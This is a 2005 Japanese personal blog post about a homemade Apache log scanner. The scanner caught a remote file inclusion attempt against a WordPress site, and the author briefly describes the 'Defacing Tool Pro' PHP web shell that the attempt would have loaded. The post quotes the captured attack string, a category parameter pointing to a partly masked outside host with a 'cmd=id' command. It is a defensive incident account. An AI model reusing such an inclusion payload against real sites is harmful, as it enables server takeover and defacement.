hiromasa.zone : o)

2005/7/23 Saturday 投稿時の月齢:16.9  月名:立待月  潮汐:大潮 Moon:16.9[立待月]今日の心技体 : 好調期好調期好調期

招かざる客 このエントリをはてなブックマークに追加このエントリをdel.icio.usに追加

日記 - ひろまさ @ 9:10

今朝起床後PCを起動すると、働かないと思っていたものが動いていた。

あやしい Apache ログ検出スクリプト。

お手製のものですが、まぁなんだってわけでもないです。URL の引数に通常は入らない文字列があるのを検出するスクリプト。

DB の SQL 構文(SQLインジェクション)とか、URL(ファイルインジェクション) とか、UNIX のコマンド(コマンドインジェクション)とか、ものすごい長い(バッファオーバーラン)とかのセキュリティホールねらいの変なアクセスを検知します。

で、ひっかかったのはこれ。

cat=http://mi.*****.net.do/carlos18/tool25.dot?&cmd=id

WordPress の index.php に対するこんなアクセスが。 cat はカテゴリを指定する引数ですが、ここに URL をつっこんできていて、あきらかにファイルインジェクションを使ったクラックです。一応 URL は伏せ字。

・・・やられたか。。 とおもってサイト見てみたら無事でした。 よかつた。

一応確認してみると、cat の引数にはファイルインジェクションの脆弱性はなさそうで事なきを得たようです。 無作為にしては cat って引数はあっているし、WP のバージョンによっては脆弱性があるのでしょうか。(未確認)

まぁやられっぱなしもよくないので、何をやっているか見る。

dtp

ファイルインジェクションがうまく動いちゃうと、こんなふうにサーバの情報を表示しつつ、コマンドCGI (PHP だけど)でサーバを操作できるようになるようです。 Defacing Tool Pro という名前らしい。

de・face
━━ vt. 表面を傷つける[摩滅する]; 読めなくする, わからなくする.

しかしソースの汚いスクリプトだ。 子供達よ、Pro とかつけるんなら、もうちょっとましにかけ。 そんなんじゃプロになれないぞ。 🙂

No Comments


このサイトはコンテンツをフリーズしました。トラックバック・コメントは閉じられています。

新しいサイトは、

hiromasa.another :o)

です。 :-)

このサイトについて

このブログは引っ越しを行いコンテンツはフリーズしています。hiromasa.anotherへどうぞ。

Powerd By WordPress

We (Heart) WordPress

WordPressME Logo
WordPress Plugins

ブログ内検索

Todays Popular

WordPress Ring

はてなリング - WordPress -

情報

31 queries. 0.495 seconds.

このページの先頭へ